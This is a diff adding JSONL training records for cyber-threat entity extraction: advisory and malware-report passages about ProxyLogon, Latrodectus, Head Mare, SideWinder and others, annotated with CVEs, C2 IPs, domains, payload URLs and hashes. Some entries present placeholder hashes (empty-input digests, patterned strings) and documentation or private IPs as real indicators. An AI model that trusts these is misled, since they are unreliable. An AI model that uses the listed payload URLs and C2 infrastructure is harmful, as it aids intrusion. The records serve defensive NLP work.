+ {"text": "CISA has published ICS Advisory ICSA-26-04-01 for Rockwell Automation ControlLogix and CompactLogix controllers. CVE-2021-22681 allows unauthorized access to Logix controllers through insufficient credential protection. Additionally, Hikvision IP cameras are affected by CVE-2017-7921, an improper authentication vulnerability enabling privilege escalation. Industrial control system operators should segment OT networks from IT infrastructure and monitor for anomalous Modbus and EtherNet/IP traffic.", "spans": {"ORGANIZATION: CISA": [[0, 4]], "ORGANIZATION: Rockwell Automation": [[50, 69]], "SYSTEM: ControlLogix": [[70, 82]], "SYSTEM: CompactLogix": [[87, 99]], "CVE_ID: CVE-2021-22681": [[113, 127]], "VULNERABILITY: insufficient credential protection": [[184, 218]], "ORGANIZATION: Hikvision": [[234, 243]], "CVE_ID: CVE-2017-7921": [[271, 284]], "VULNERABILITY: improper authentication vulnerability": [[289, 326]]}, "info": {"id": "cisa_00028", "source": "cisa_advisories"}}
30
+ {"text": "The Play ransomware group has targeted organizations using CVE-2022-41040 and CVE-2022-41082 in Microsoft Exchange Server, collectively known as ProxyNotShell. After exploitation, the actors deployed a webshell at C:\\inetpub\\wwwroot\\aspnet_client\\discover.aspx. The ransomware encrypted files with the .play extension. FBI investigation uncovered command and control infrastructure at 45.76.172.198 and 64.190.113.52. Encrypted DNS over HTTPS was used to evade detection.", "spans": {"MALWARE: Play": [[4, 8]], "CVE_ID: CVE-2022-41040": [[59, 73]], "CVE_ID: CVE-2022-41082": [[78, 92]], "SYSTEM: Microsoft Exchange Server": [[96, 121]], "FILEPATH: C:\\inetpub\\wwwroot\\aspnet_client\\discover.aspx": [[214, 260]], "ORGANIZATION: FBI": [[319, 322]], "IP_ADDRESS: 45.76.172.198": [[385, 398]], "IP_ADDRESS: 64.190.113.52": [[403, 416]]}, "info": {"id": "cisa_00029", "source": "cisa_advisories"}}
31
+ {"text": "PaperCut NG/MF is impacted by CVE-2023-27351, an improper authentication vulnerability allowing remote attackers to bypass authentication via the SecurityRequestFilter class. This vulnerability is known to be used in ransomware campaigns. Kentico Xperience contains CVE-2025-2749, a path traversal vulnerability enabling file upload by authenticated users. Synacor Zimbra Collaboration Suite is affected by CVE-2025-48700 and CVE-2025-66376, both cross-site scripting vulnerabilities.", "spans": {"SYSTEM: PaperCut NG/MF": [[0, 14]], "CVE_ID: CVE-2023-27351": [[30, 44]], "VULNERABILITY: improper authentication vulnerability": [[49, 86]], "SYSTEM: Kentico Xperience": [[239, 256]], "CVE_ID: CVE-2025-2749": [[266, 279]], "VULNERABILITY: path traversal vulnerability": [[283, 311]], "SYSTEM: Zimbra Collaboration Suite": [[365, 391]], "ORGANIZATION: Synacor": [[357, 364]], "CVE_ID: CVE-2025-48700": [[407, 421]], "CVE_ID: CVE-2025-66376": [[426, 440]], "VULNERABILITY: cross-site scripting vulnerabilities": [[447, 483]]}, "info": {"id": "cisa_00030", "source": "cisa_advisories"}}
32
+ {"text": "CISA Emergency Directive 21-02 mandated immediate action on Microsoft Exchange Server vulnerabilities CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065, collectively known as ProxyLogon. The threat actor HAFNIUM exploited these vulnerabilities to deploy China Chopper webshells. Affected organizations should search for indicators in the C:\\Windows\\Temp\\lsass directory and review IIS logs at C:\\inetpub\\logs\\LogFiles for suspicious POST requests.", "spans": {"ORGANIZATION: CISA": [[0, 4]], "SYSTEM: Microsoft Exchange Server": [[60, 85]], "CVE_ID: CVE-2021-26855": [[102, 116]], "CVE_ID: CVE-2021-26857": [[118, 132]], "CVE_ID: CVE-2021-26858": [[134, 148]], "CVE_ID: CVE-2021-27065": [[154, 168]], "THREAT_ACTOR: HAFNIUM": [[221, 228]], "MALWARE: China Chopper": [[271, 284]], "FILEPATH: C:\\Windows\\Temp\\lsass": [[355, 376]], "FILEPATH: C:\\inetpub\\logs\\LogFiles": [[410, 434]]}, "info": {"id": "cisa_00031", "source": "cisa_advisories"}}
33
+ {"text": "Langflow, an open-source AI application builder, is affected by CVE-2026-33017, a code injection vulnerability that could allow unauthenticated users to build public flows. Similarly, n8n contains CVE-2025-68613, an improper control of dynamically managed code resources vulnerability allowing remote code execution. CISA added both to the KEV catalog as active exploitation has been observed.", "spans": {"SYSTEM: Langflow": [[0, 8]], "CVE_ID: CVE-2026-33017": [[64, 78]], "VULNERABILITY: code injection vulnerability": [[82, 110]], "SYSTEM: n8n": [[184, 187]], "CVE_ID: CVE-2025-68613": [[197, 211]], "VULNERABILITY: improper control of dynamically managed code resources vulnerability": [[216, 284]], "ORGANIZATION: CISA": [[317, 321]]}, "info": {"id": "cisa_00032", "source": "cisa_advisories"}}
34
+ {"text": "VMware ESXi has been heavily targeted by ransomware operators. CVE-2019-5544 is a heap-based buffer overflow in OpenSLP allowing remote code execution via port 427. CVE-2020-3992 is a use-after-free vulnerability also in VMware ESXi OpenSLP. CVE-2021-21972 affects VMware vCenter Server with a remote code execution vulnerability in the vSphere Client plugin via port 443. VMware Workspace One is affected by CVE-2021-22054, a server-side request forgery vulnerability. Broadcom has assumed responsibility for these VMware products.", "spans": {"SYSTEM: VMware ESXi": [[0, 11], [221, 232]], "CVE_ID: CVE-2019-5544": [[63, 76]], "VULNERABILITY: heap-based buffer overflow": [[82, 108]], "CVE_ID: CVE-2020-3992": [[165, 178]], "VULNERABILITY: use-after-free vulnerability": [[184, 212]], "CVE_ID: CVE-2021-21972": [[242, 256]], "SYSTEM: VMware vCenter Server": [[265, 286]], "CVE_ID: CVE-2021-22054": [[409, 423]], "VULNERABILITY: server-side request forgery vulnerability": [[427, 468]], "SYSTEM: VMware Workspace One": [[373, 393]], "ORGANIZATION: Broadcom": [[470, 478]]}, "info": {"id": "cisa_00033", "source": "cisa_advisories"}}
35
+ {"text": "The ALPHV/BlackCat ransomware group deployed Emotet as an initial access vector followed by Cobalt Strike for command and control. Network indicators include IP addresses 198.51.100.23, 203.0.113.42, and 172.16.254.1. Malicious domains observed: download.system-update[.]cloud, c2.secure-check[.]net, and exfil.data-backup[.]org. File hash indicators: MD5 d41d8cd98f00b204e9800998ecf8427e, SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709, SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855. Victims should contact ic3.gov to report incidents.", "spans": {"THREAT_ACTOR: ALPHV": [[4, 9]], "MALWARE: BlackCat": [[10, 18]], "MALWARE: Emotet": [[45, 51]], "MALWARE: Cobalt Strike": [[92, 105]], "IP_ADDRESS: 198.51.100.23": [[171, 184]], "IP_ADDRESS: 203.0.113.42": [[186, 198]], "IP_ADDRESS: 172.16.254.1": [[204, 216]], "DOMAIN: download.system-update[.]cloud": [[246, 276]], "DOMAIN: c2.secure-check[.]net": [[278, 299]], "DOMAIN: exfil.data-backup[.]org": [[305, 328]], "HASH: d41d8cd98f00b204e9800998ecf8427e": [[356, 388]], "HASH: da39a3ee5e6b4b0d3255bfef95601890afd80709": [[395, 435]], "HASH: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855": [[444, 508]], "DOMAIN: ic3.gov": [[533, 540]]}, "info": {"id": "cisa_00034", "source": "cisa_advisories"}}
36
+ {"text": "JetBrains TeamCity is affected by CVE-2024-27199, a relative path traversal vulnerability that could allow limited admin actions. This vulnerability has been used in ransomware campaigns. Quest KACE Systems Management Appliance is impacted by CVE-2025-32975, an improper authentication vulnerability. Craft CMS contains CVE-2025-32432, a code injection vulnerability allowing remote code execution. Laravel Livewire is affected by CVE-2025-54068, a code injection vulnerability enabling unauthenticated remote command execution.", "spans": {"SYSTEM: JetBrains TeamCity": [[0, 18]], "CVE_ID: CVE-2024-27199": [[34, 48]], "VULNERABILITY: relative path traversal vulnerability": [[52, 89]], "SYSTEM: Quest KACE Systems Management Appliance": [[188, 227]], "CVE_ID: CVE-2025-32975": [[243, 257]], "VULNERABILITY: improper authentication vulnerability": [[262, 299]], "SYSTEM: Craft CMS": [[301, 310]], "CVE_ID: CVE-2025-32432": [[320, 334]], "VULNERABILITY: code injection vulnerability": [[338, 366], [449, 477]], "SYSTEM: Laravel Livewire": [[399, 415]], "CVE_ID: CVE-2025-54068": [[431, 445]]}, "info": {"id": "cisa_00035", "source": "cisa_advisories"}}
37
+ {"text": "Multiple Ivanti products have been targeted in the wild. CVE-2021-22893 is a use-after-free vulnerability in Ivanti Pulse Connect Secure allowing unauthenticated remote code execution via license services. CVE-2019-11510 enables arbitrary file read in Pulse Connect Secure through crafted HTTPS URIs. CVE-2021-22894 is a buffer overflow in the Collaboration Suite. CISA Emergency Directive 21-03 required agencies to assess and mitigate these Ivanti vulnerabilities. Defenders should review /data/runtime/mtmp/lmdb/ for suspicious files.", "spans": {"ORGANIZATION: Ivanti": [[9, 15], [109, 115], [443, 449]], "CVE_ID: CVE-2021-22893": [[57, 71]], "VULNERABILITY: use-after-free vulnerability": [[77, 105]], "SYSTEM: Ivanti Pulse Connect Secure": [[109, 136]], "CVE_ID: CVE-2019-11510": [[206, 220]], "SYSTEM: Pulse Connect Secure": [[116, 136], [252, 272]], "CVE_ID: CVE-2021-22894": [[301, 315]], "VULNERABILITY: buffer overflow": [[321, 336]], "ORGANIZATION: CISA": [[365, 369]], "FILEPATH: /data/runtime/mtmp/lmdb/": [[491, 515]]}, "info": {"id": "cisa_00036", "source": "cisa_advisories"}}
38
+ {"text": "Adobe Acrobat and Reader are affected by two vulnerabilities in the CISA KEV catalog. CVE-2020-9715 is a use-after-free vulnerability in Adobe Acrobat that allows code execution. CVE-2026-34621 is a prototype pollution vulnerability in Adobe Acrobat and Reader that enables arbitrary code execution. Adobe has released security updates through APSB20-48 and APSB26-43. Organizations should update to the latest versions of Adobe Acrobat and Reader.", "spans": {"SYSTEM: Adobe Acrobat": [[0, 13], [137, 150], [236, 249], [423, 436]], "SYSTEM: Reader": [[18, 24], [254, 260], [441, 447]], "ORGANIZATION: CISA": [[68, 72]], "CVE_ID: CVE-2020-9715": [[86, 99]], "VULNERABILITY: use-after-free vulnerability": [[105, 133]], "CVE_ID: CVE-2026-34621": [[179, 193]], "VULNERABILITY: prototype pollution vulnerability": [[199, 232]], "ORGANIZATION: Adobe": [[0, 5], [137, 142], [236, 241], [300, 305], [423, 428]]}, "info": {"id": "cisa_00037", "source": "cisa_advisories"}}
39
+ {"text": "SonicWall Email Security has been targeted through an exploit chain involving CVE-2021-20021, CVE-2021-20022, and CVE-2021-20023. CVE-2021-20021 is an improper privilege management vulnerability allowing administrative account creation. CVE-2021-20022 enables unrestricted file upload. CVE-2021-20023 is a path traversal vulnerability for file reading. SonicWall SMA100 is separately affected by CVE-2021-20016, a SQL injection vulnerability used in ransomware campaigns.", "spans": {"SYSTEM: SonicWall Email Security": [[0, 24]], "CVE_ID: CVE-2021-20021": [[78, 92], [130, 144]], "CVE_ID: CVE-2021-20022": [[94, 108], [237, 251]], "CVE_ID: CVE-2021-20023": [[114, 128], [286, 300]], "VULNERABILITY: improper privilege management vulnerability": [[151, 194]], "VULNERABILITY: unrestricted file upload": [[260, 284]], "VULNERABILITY: path traversal vulnerability": [[306, 334]], "SYSTEM: SonicWall SMA100": [[353, 369]], "CVE_ID: CVE-2021-20016": [[396, 410]], "VULNERABILITY: SQL injection vulnerability": [[414, 441]]}, "info": {"id": "cisa_00038", "source": "cisa_advisories"}}
40
+ {"text": "Threat intelligence from CrowdStrike and Palo Alto Networks Unit 42 identified the Turla threat group deploying the Snake malware implant. Network communication was observed to 162.255.119.58, 78.128.113.34, and 45.33.32.156 over encrypted channels. The malware configuration file was stored at /var/tmp/.snake/snake.conf on compromised Linux servers. SHA256 hashes of observed Snake variants: 1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b and 2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b3c. CISA and FBI urge network defenders to hunt for these indicators.", "spans": {"ORGANIZATION: CrowdStrike": [[25, 36]], "ORGANIZATION: Palo Alto Networks": [[41, 59]], "THREAT_ACTOR: Turla": [[83, 88]], "MALWARE: Snake": [[116, 121], [378, 383]], "IP_ADDRESS: 162.255.119.58": [[177, 191]], "IP_ADDRESS: 78.128.113.34": [[193, 206]], "IP_ADDRESS: 45.33.32.156": [[212, 224]], "FILEPATH: /var/tmp/.snake/snake.conf": [[295, 321]], "HASH: 1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b": [[394, 458]], "HASH: 2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2b3c": [[463, 527]], "ORGANIZATION: CISA": [[529, 533]], "ORGANIZATION: FBI": [[538, 541]]}, "info": {"id": "cisa_00039", "source": "cisa_advisories"}}
data/processed/backup/llm_annotated_exploitdb.jsonl ADDED
The diff for this file is too large to render. See raw diff
 
data/processed/backup/llm_annotated_malware.jsonl ADDED
@@ -0,0 +1,25 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {"text": "In September 2024, Kaspersky researchers documented coordinated attacks by Head Mare and Twelve against Russian organizations. Head Mare deployed CobInt, previously exclusive to Twelve, and their custom backdoor PhantomJitter. The attackers used LockBit 3.0 for Windows ransomware encryption and Babuk for NAS ransomware. Credential dumping relied on mimikatz, secretsdump, and ProcDump. Tunneling was achieved via cloudflared, Gost, Localtonet, ngrok, and revsocks. The C2 domain 360nvidia.com resolved to 45.156.27.115, with additional C2 servers at 45.156.21.148, 45.87.246.34, 185.158.248.107, 185.229.9.27, and 64.7.198.109. Another C2 domain was web-telegram.uk. PhantomJitter was downloaded from http://45.87.246.34:443/calc.exe and http://185.158.248.107:443/calc.exe. The attackers exploited CVE-2023-38831 in WinRAR and CVE-2021-26855 in Microsoft Exchange. Persistence used services named winsw and winuac. Malicious files were placed at C:\\Windows\\System32\\winsw.exe, C:\\ProgramData\\MicrosoftDrive\\mcdrive.vbs, and C:\\Windows\\System32\\inetsrv\\calc.exe. Lateral movement relied on PSExec, smbexec, and wmiexec. Network scanning used fscan and SoftPerfect Network Scanner. 
Data exfiltration used rclone through SFTP.", "spans": {"ORGANIZATION: Kaspersky": [[19, 28]], "THREAT_ACTOR: Head Mare": [[75, 84], [127, 136]], "THREAT_ACTOR: Twelve": [[89, 95], [178, 184]], "MALWARE: CobInt": [[146, 152]], "MALWARE: PhantomJitter": [[212, 225], [669, 682]], "MALWARE: LockBit 3.0": [[246, 257]], "MALWARE: Babuk": [[296, 301]], "TOOL: mimikatz": [[351, 359]], "TOOL: secretsdump": [[361, 372]], "TOOL: ProcDump": [[378, 386]], "TOOL: cloudflared": [[415, 426]], "TOOL: Gost": [[428, 432]], "TOOL: Localtonet": [[434, 444]], "TOOL: ngrok": [[446, 451]], "TOOL: revsocks": [[457, 465]], "DOMAIN: 360nvidia.com": [[481, 494]], "IP_ADDRESS: 45.156.27.115": [[507, 520]], "IP_ADDRESS: 45.156.21.148": [[552, 565]], "IP_ADDRESS: 45.87.246.34": [[567, 579], [710, 722]], "IP_ADDRESS: 185.158.248.107": [[581, 596], [747, 762]], "IP_ADDRESS: 185.229.9.27": [[598, 610]], "IP_ADDRESS: 64.7.198.109": [[616, 628]], "DOMAIN: web-telegram.uk": [[652, 667]], "URL: http://45.87.246.34:443/calc.exe": [[703, 735]], "URL: http://185.158.248.107:443/calc.exe": [[740, 775]], "CVE_ID: CVE-2023-38831": [[801, 815]], "SYSTEM: WinRAR": [[819, 825]], "CVE_ID: CVE-2021-26855": [[830, 844]], "SYSTEM: Microsoft Exchange": [[848, 866]], "FILEPATH: C:\\Windows\\System32\\winsw.exe": [[949, 978]], "FILEPATH: C:\\ProgramData\\MicrosoftDrive\\mcdrive.vbs": [[980, 1021]], "FILEPATH: C:\\Windows\\System32\\inetsrv\\calc.exe": [[1027, 1063]], "TOOL: PSExec": [[1092, 1098]], "TOOL: smbexec": [[1100, 1107]], "TOOL: wmiexec": [[1113, 1120]], "TOOL: fscan": [[1144, 1149]], "TOOL: SoftPerfect Network Scanner": [[1154, 1181]], "TOOL: rclone": [[1206, 1212]]}, "info": {"id": "malware_00001", "source": "malware_reports"}}
2
+ {"text": "SideWinder APT expanded operations in H2 2024, targeting maritime, nuclear, and logistics sectors across Asia and Africa. The infection chain starts with spear-phishing emails containing DOCX files with remote template injection, leading to an RTF exploit for CVE-2017-11882 in Microsoft Office. The attack deploys a JavaScript loader, followed by a .NET Downloader Module, a Backdoor Loader using DLL sideloading, and the StealerBot post-exploitation toolkit. Observed DLL names include JetCfg.dll, policymanager.dll, winmm.dll, xmllite.dll, and UxTheme.dll. C2 domains included pmd-office.info, modpak.info, dirctt888.info, dowmloade.org, portdedjibouti.live, d0wnlaod.com, file-dwnld.org, defencearmy.pro, document-viewer.info, ms-office.app, and zeltech.live. File hashes observed: e9726519487ba9e4e5589a8a5ec2f933, d36a67468d01c4cb789cd6794fb8bc70, 313f9bbe6dac3edc09fe9ac081950673, bd8043127abe3f5cfa152a53b257fd1a.", "spans": {"THREAT_ACTOR: SideWinder": [[0, 10]], "CVE_ID: CVE-2017-11882": [[260, 274]], "SYSTEM: Microsoft Office": [[278, 294]], "MALWARE: StealerBot": [[423, 433]], "FILEPATH: JetCfg.dll": [[488, 498]], "FILEPATH: policymanager.dll": [[500, 517]], "FILEPATH: winmm.dll": [[519, 528]], "FILEPATH: xmllite.dll": [[530, 541]], "FILEPATH: UxTheme.dll": [[547, 558]], "DOMAIN: pmd-office.info": [[580, 595]], "DOMAIN: modpak.info": [[597, 608]], "DOMAIN: dirctt888.info": [[610, 624]], "DOMAIN: dowmloade.org": [[626, 639]], "DOMAIN: portdedjibouti.live": [[641, 660]], "DOMAIN: d0wnlaod.com": [[662, 674]], "DOMAIN: file-dwnld.org": [[676, 690]], "DOMAIN: defencearmy.pro": [[692, 707]], "DOMAIN: document-viewer.info": [[709, 729]], "DOMAIN: ms-office.app": [[731, 744]], "DOMAIN: zeltech.live": [[750, 762]], "HASH: e9726519487ba9e4e5589a8a5ec2f933": [[786, 818]], "HASH: d36a67468d01c4cb789cd6794fb8bc70": [[820, 852]], "HASH: 313f9bbe6dac3edc09fe9ac081950673": [[854, 886]], "HASH: bd8043127abe3f5cfa152a53b257fd1a": [[888, 920]]}, "info": {"id": 
"malware_00002", "source": "malware_reports"}}
3
+ {"text": "Latrodectus is a downloader malware first observed in November 2023, assessed to be developed by the IcedID developers. It was distributed by threat actors TA577 and TA578 through email campaigns. The malware uses RC4 encryption with the static key 12345 and base64 encoding for C2 communications. Key C2 domains include aytobusesre.com, scifimond.com, mazdakrichest.com, riverhasus.com, peermangoz.me, aprettopizza.world, nimeklroboti.info, and frotneels.shop. Payload distribution URLs observed were hxxp://162.55.217.30/gRMS/0.6395541546258323.dat, hxxp://157.90.166.88/O3ZlYNW/0.7797109211833805.dat, and hxxp://128.140.36.37/cQtDIo/0.43650426987684443.dat. Additional infrastructure included hxxp://178.23.190.199:80/share/gsm.msi, hxxp://5.252.21.207/share/escape.msi, and hxxp://95.164.3.171/share/cisa.msi. Associated C2 IP addresses included 77.91.73.187, 74.119.193.200, 162.55.217.30, 157.90.166.88, 128.140.36.37, 178.23.190.199, 5.252.21.207, and 95.164.3.171. The SHA256 hash of the primary sample is aee22a35cbdac3f16c3ed742c0b1bfe9739a13469cf43b36fb2c63565111028c. 
Persistence is established at C:\\Users\\AppData\\Roaming\\Custom_update\\Update_hex.dll with a scheduled task named Updater.", "spans": {"MALWARE: Latrodectus": [[0, 11]], "MALWARE: IcedID": [[101, 107]], "THREAT_ACTOR: TA577": [[156, 161]], "THREAT_ACTOR: TA578": [[166, 171]], "DOMAIN: aytobusesre.com": [[321, 336]], "DOMAIN: scifimond.com": [[338, 351]], "DOMAIN: mazdakrichest.com": [[353, 370]], "DOMAIN: riverhasus.com": [[372, 386]], "DOMAIN: peermangoz.me": [[388, 401]], "DOMAIN: aprettopizza.world": [[403, 421]], "DOMAIN: nimeklroboti.info": [[423, 440]], "DOMAIN: frotneels.shop": [[446, 460]], "URL: hxxp://162.55.217.30/gRMS/0.6395541546258323.dat": [[502, 550]], "URL: hxxp://157.90.166.88/O3ZlYNW/0.7797109211833805.dat": [[552, 603]], "URL: hxxp://128.140.36.37/cQtDIo/0.43650426987684443.dat": [[609, 660]], "URL: hxxp://178.23.190.199:80/share/gsm.msi": [[697, 735]], "URL: hxxp://5.252.21.207/share/escape.msi": [[737, 773]], "URL: hxxp://95.164.3.171/share/cisa.msi": [[779, 813]], "IP_ADDRESS: 77.91.73.187": [[851, 863]], "IP_ADDRESS: 74.119.193.200": [[865, 879]], "IP_ADDRESS: 162.55.217.30": [[509, 522], [881, 894]], "IP_ADDRESS: 157.90.166.88": [[559, 572], [896, 909]], "IP_ADDRESS: 128.140.36.37": [[616, 629], [911, 924]], "IP_ADDRESS: 178.23.190.199": [[704, 718], [926, 940]], "IP_ADDRESS: 5.252.21.207": [[744, 756], [942, 954]], "IP_ADDRESS: 95.164.3.171": [[786, 798], [960, 972]], "HASH: aee22a35cbdac3f16c3ed742c0b1bfe9739a13469cf43b36fb2c63565111028c": [[1015, 1079]], "FILEPATH: C:\\Users\\AppData\\Roaming\\Custom_update\\Update_hex.dll": [[1111, 1164]]}, "info": {"id": "malware_00003", "source": "malware_reports"}}
4
+ {"text": "Microsoft reported that Silk Typhoon, also known as HAFNIUM, has been targeting IT supply chains to gain access to downstream customers. The group exploited CVE-2025-0282 and CVE-2025-0283 in Ivanti Pulse Connect VPN, CVE-2024-3400 in Palo Alto Networks PAN-OS, CVE-2023-3519 in Citrix NetScaler ADC, and the ProxyLogon chain including CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 in Microsoft Exchange Server. The group used compromised Cyberoam appliances, Zyxel routers, and QNAP devices as covert network infrastructure, along with short-lease VPS infrastructure for operations.", "spans": {"ORGANIZATION: Microsoft": [[0, 9], [406, 415]], "THREAT_ACTOR: Silk Typhoon": [[24, 36]], "THREAT_ACTOR: HAFNIUM": [[52, 59]], "CVE_ID: CVE-2025-0282": [[157, 170]], "CVE_ID: CVE-2025-0283": [[175, 188]], "SYSTEM: Ivanti Pulse Connect VPN": [[192, 216]], "CVE_ID: CVE-2024-3400": [[218, 231]], "SYSTEM: Palo Alto Networks PAN-OS": [[235, 260]], "CVE_ID: CVE-2023-3519": [[262, 275]], "SYSTEM: Citrix NetScaler ADC": [[279, 299]], "CVE_ID: CVE-2021-26855": [[336, 350]], "CVE_ID: CVE-2021-26857": [[352, 366]], "CVE_ID: CVE-2021-26858": [[368, 382]], "CVE_ID: CVE-2021-27065": [[388, 402]], "SYSTEM: Microsoft Exchange Server": [[406, 431]], "SYSTEM: Cyberoam": [[460, 468]], "SYSTEM: Zyxel": [[481, 486]], "SYSTEM: QNAP": [[500, 504]]}, "info": {"id": "malware_00004", "source": "malware_reports"}}
5
+ {"text": "Kaspersky SOC investigated a Behinder web shell deployment on a SharePoint server in Southeast Asia. The Behinder toolkit, also known as Rebeyond, features AES-encrypted C2 communication and supports PHP, Java, and ASP.NET. Initial access was achieved via certutil downloading payloads from Bashupload. Privilege escalation used multiple Potato variants: GodPotato, BadPotato, and SweetPotato, all executed in memory. Malicious files were stored at C:\\ProgramData\\DRM\\ and C:\\Users\\Default\\Videos\\. The web shell was disguised as a 404 error page and the analysis identified .NET modules including BasicInfo.dll, Cmd.dll, and FileOperation.dll.", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "MALWARE: Behinder": [[29, 37], [105, 113]], "SYSTEM: SharePoint": [[64, 74]], "TOOL: certutil": [[256, 264]], "TOOL: GodPotato": [[355, 364]], "TOOL: BadPotato": [[366, 375]], "TOOL: SweetPotato": [[381, 392]], "FILEPATH: C:\\ProgramData\\DRM\\": [[449, 468]], "FILEPATH: C:\\Users\\Default\\Videos\\": [[473, 497]], "FILEPATH: BasicInfo.dll": [[598, 611]], "FILEPATH: Cmd.dll": [[613, 620]], "FILEPATH: FileOperation.dll": [[626, 643]], "SYSTEM: PHP": [[200, 203]], "SYSTEM: Java": [[205, 209]], "SYSTEM: ASP.NET": [[215, 222]]}, "info": {"id": "malware_00005", "source": "malware_reports"}}
6
+ {"text": "A comparative analysis of post-exploitation frameworks evaluated Cobalt Strike, Metasploit Meterpreter, Sliver, Havoc, and Mythic. Cobalt Strike uses immutable opcode sequences that break when modified. Metasploit Meterpreter appears in Microsoft antivirus signatures over 230 times. Sliver generates 8-9 MB payloads, larger than the ideal 100 KB target. The Mythic framework supports custom communication channels including HTTP, TCP, Slack, and Telegram, with payload sizes around 50 KB in C. The proposed attack chain uses three stages: Stage 0 for artifact generation, Stage 1 for reconnaissance and persistence, and Stage 2 for lateral movement and data exfiltration. Memory allocation via VirtualAlloc may trigger security alerts.", "spans": {"MALWARE: Cobalt Strike": [[65, 78], [131, 144]], "TOOL: Metasploit": [[80, 90], [203, 213]], "TOOL: Meterpreter": [[91, 102], [214, 225]], "MALWARE: Sliver": [[104, 110], [284, 290]], "MALWARE: Havoc": [[112, 117]], "TOOL: Mythic": [[123, 129], [359, 365]], "ORGANIZATION: Microsoft": [[237, 246]]}, "info": {"id": "malware_00006", "source": "malware_reports"}}
7
+ {"text": "Elastic Security Labs analyzed Latrodectus malware with SHA-256 hash aee22a35cbdac3f16c3ed742c0b1bfe9739a13469cf43b36fb2c63565111028c, identified as TRUFOS.DLL. The malware communicates with C2 domains aytobusesre.com and scifimond.com, with associated IcedID C2s at gyxplonto.com and neaachar.com. Persistence is maintained at C:\\Users\\AppData\\Roaming\\Custom_update\\Update_hex.dll with configuration stored in AppData\\Roaming\\Custom_update\\update_data.dat. The IcedID payload executes from C:\\Users\\AppData\\Roaming\\random\\random.dll. Downloaded payloads are cached at AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\. The campaign identifier in this sample was Littlehw. C2 traffic uses base64 and RC4 encryption with the hardcoded password 12345, posting HTTPS requests to the /live/ endpoint. The User-Agent string is Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1).", "spans": {"ORGANIZATION: Elastic Security Labs": [[0, 21]], "MALWARE: Latrodectus": [[31, 42]], "HASH: aee22a35cbdac3f16c3ed742c0b1bfe9739a13469cf43b36fb2c63565111028c": [[69, 133]], "FILEPATH: TRUFOS.DLL": [[149, 159]], "DOMAIN: aytobusesre.com": [[202, 217]], "DOMAIN: scifimond.com": [[222, 235]], "MALWARE: IcedID": [[253, 259], [462, 468]], "DOMAIN: gyxplonto.com": [[267, 280]], "DOMAIN: neaachar.com": [[285, 297]], "FILEPATH: C:\\Users\\AppData\\Roaming\\Custom_update\\Update_hex.dll": [[328, 381]], "FILEPATH: AppData\\Roaming\\Custom_update\\update_data.dat": [[411, 456]], "FILEPATH: C:\\Users\\AppData\\Roaming\\random\\random.dll": [[491, 533]], "FILEPATH: AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\": [[569, 614]]}, "info": {"id": "malware_00007", "source": "malware_reports"}}
8
+ {"text": "Proofpoint identified 32 Latrodectus samples with the following SHA256 hashes: db03a34684feab7475862080f59d4d99b32c74d3a152a53b257fd1a443e8ee77, e99f3517a36a9f7a55335699cfb4d84d08b042d47146119156f7f3bab580b4d7, bb525dc6b7a7ebefd040e01fd48d7d4e178f8d9e5dec9033078ced4e9aa4e241, 97e093f2e0bf6dec8392618722dd6b4411088fe752bedece910d11fffe0288a2, f9c69e79e7799df31d6516df70148d7832b121d330beebe52cff6606f0724c62, d9471b038c44619739176381815bfa9a13b5ff77021007a4ede9b146ed2e04ec, and d98cd810d568f338f16c4637e8a9cb01ff69ee1967f4cfc004de3f283d61ba81. Additional hashes include 47d66c576393a4256d94f5ed1e77adc28426dea027f7a23e2dbf41b93b87bd78, 5d881d14d2336273e531b1b3d6f2d907539fe8489cbe80533280c9c72efa2273, and 10c129e2310342a55df5fa88331f338452835790a379d5230ee8de7d5f28ea1a.", "spans": {"ORGANIZATION: Proofpoint": [[0, 10]], "MALWARE: Latrodectus": [[25, 36]], "HASH: db03a34684feab7475862080f59d4d99b32c74d3a152a53b257fd1a443e8ee77": [[79, 143]], "HASH: e99f3517a36a9f7a55335699cfb4d84d08b042d47146119156f7f3bab580b4d7": [[145, 209]], "HASH: bb525dc6b7a7ebefd040e01fd48d7d4e178f8d9e5dec9033078ced4e9aa4e241": [[211, 275]], "HASH: 97e093f2e0bf6dec8392618722dd6b4411088fe752bedece910d11fffe0288a2": [[277, 341]], "HASH: f9c69e79e7799df31d6516df70148d7832b121d330beebe52cff6606f0724c62": [[343, 407]], "HASH: d9471b038c44619739176381815bfa9a13b5ff77021007a4ede9b146ed2e04ec": [[409, 473]], "HASH: d98cd810d568f338f16c4637e8a9cb01ff69ee1967f4cfc004de3f283d61ba81": [[479, 543]], "HASH: 47d66c576393a4256d94f5ed1e77adc28426dea027f7a23e2dbf41b93b87bd78": [[571, 635]], "HASH: 5d881d14d2336273e531b1b3d6f2d907539fe8489cbe80533280c9c72efa2273": [[637, 701]], "HASH: 10c129e2310342a55df5fa88331f338452835790a379d5230ee8de7d5f28ea1a": [[707, 771]]}, "info": {"id": "malware_00008", "source": "malware_reports"}}
9
